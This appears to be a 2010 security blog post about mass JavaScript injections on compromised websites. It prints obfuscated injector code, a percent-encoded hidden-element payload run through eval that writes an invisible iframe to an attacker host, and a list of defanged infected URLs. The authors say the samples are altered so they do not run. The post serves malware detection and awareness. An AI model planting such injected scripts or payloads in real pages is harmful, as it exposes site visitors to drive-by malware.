Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.

As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.

We recently saw a strong rise in the appearance of the malicious code below:

this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow="";var  f="";
var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4

By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.

this.v="";:LineMixer [var i=

Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the Google’s Safe Browsing List are not complete.

Till next time.

We show a small sample of the 3000+ infected websites below:

hxxp://saipanlawyer.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.citydusk.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://de.pastebin.ca/1798028/    (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.hotel-ederhof.com/     (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://fast-weight-loss-plan.org/ (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)

The original post is found here , answered by redleg on Badwarebusters.org.

This malware, found embedded in “eslpod.com/website/index.php”, is displayed below. The code has been slightly modified so as not to work as intended if loaded up and run in a browser.

<h4 id="Fl" style="display:none;">%64%6f%63%75%6d%65%6e%74%2e%77%72%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%22%68%74%74%70%3a%2f%2f%74%72%61%66%2e%74%72%61%6e%73%63%6f%6e%74%69%6e%65%6e%74%61%6c%2d%73%65%72%76%69%63%65%2e%67%2f%69%6e%64%65%78%2e%70%68%70%5c%22%20%73%74%79%6c%65%3d%5c%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%5c%22%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</h4>

<script>
ar aK=docume nt.getElem entById("Fl"), A x=ev al;
aK = aK.inne rHTML;
Ax(unescape(aK));
</script>

It is interesting to see how hackers are trying out new tricks to fool scanning systems. Most code-injection attacks deliver the payload directly within the script tags. Here, the case is slightly different. The individual has attempted to disguise the malicious payload as a simple web element inside the page by using Javascript and the getElementById function. The code then proceeds to execute the malicious payload.

The payload by itself is not so interesting. It has been known to appear in different variants before this particular example.

The payload is displayed below:

document.wri te("<ifra me src=\"hxxp://traff.tr anscon tin enta l-serv ice.org/i n dex.php\" style=\"dis play:none;\"></ifr me>");

The iframe referred to here refers to the following:

<!--LiveInternet counter-->
<script t ype="text/javascript">
<!--
document.write("<a href='hxxp://www.li veinte rnet.ru/click' "+
"target=_blank><img src='hxxp://cou nter.yad ro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+"' alt='' title='LiveInternet: ïîêàçàíî ÷èñëî ïðîñìîòðîâ è"+
" ïîñåòèòåëåé çà 24 ÷àñà' "+"border='0' width='88' height='31'><\/a>")
//-->
</script>
<!--/LiveInternet-->

This snippet should be flagged by many scanning services simply because of the reputation of the sites mentioned inside it (see Malware Patrol).

Till next time, surf safe.